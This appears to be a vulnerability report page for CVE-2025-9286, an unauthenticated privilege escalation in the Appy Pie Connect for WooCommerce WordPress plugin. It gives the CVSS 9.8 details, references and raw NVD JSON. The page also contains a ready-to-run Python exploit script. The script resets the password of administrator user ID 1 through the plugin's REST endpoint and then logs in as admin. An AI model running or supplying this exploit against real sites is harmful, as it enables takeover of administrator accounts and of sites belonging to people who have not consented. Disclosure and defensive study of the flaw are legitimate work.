Security Vulnerability Report
CVE-2025-9286 CVSS 9.8 CRITICAL

CVE-2025-9286

Published: 2025-10-03 12:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Appy Pie Connect for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the reset_user_password() REST handler in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to reset the password of arbitrary users, including administrators, thereby gaining administrative access.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Appy Pie Connect for WooCommerce <= 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9286 PoC - Appy Pie Connect for WooCommerce Privilege Escalation
# Exploits missing authorization in reset_user_password() REST handler
import requests

# Target WordPress site URL
target_url = "http://target-wordpress-site.com"

# REST API endpoint for password reset (unauthenticated)
reset_endpoint = f"{target_url}/wp-json/appy-pie-connect/v1/reset-password"

# Target user ID (1 is typically the first administrator)
target_user_id = 1

# New password to set for the target user
new_password = "Pwned123!@#"

# Construct the malicious request payload
payload = {
    "user_id": target_user_id,
    "password": new_password
}

# Send the unauthenticated POST request to reset the admin password
response = requests.post(
    reset_endpoint,
    json=payload,
    headers={"Content-Type": "application/json"}
)

if response.status_code == 200:
    print(f"[+] Password reset successful!")
    print(f"[+] Admin credentials: admin / {new_password}")

    # Now login with the new credentials
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    login_data = {
        "log": "admin",
        "pwd": new_password,
        "wp-submit": "Log In",
        "redirect_to": f"{target_url}/wp-admin/",
        "testcookie": "1"
    }
    session.post(login_url, data=login_data)
    print(f"[+] Logged in as administrator")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9286", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:47.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appy Pie Connect for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the reset_user_password() REST handler in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to to reset the password of arbitrary users, including administrators, thereby gaining administrative access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/appy-pie-connect-for-woocommerce/trunk/connect-woocommerce-rest-api.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385150/", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/appy-pie-connect-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/36fb5b8d-1ea4-45c2-8639-b229efdb57db?source=cve", "source": "[email protected]"}]}}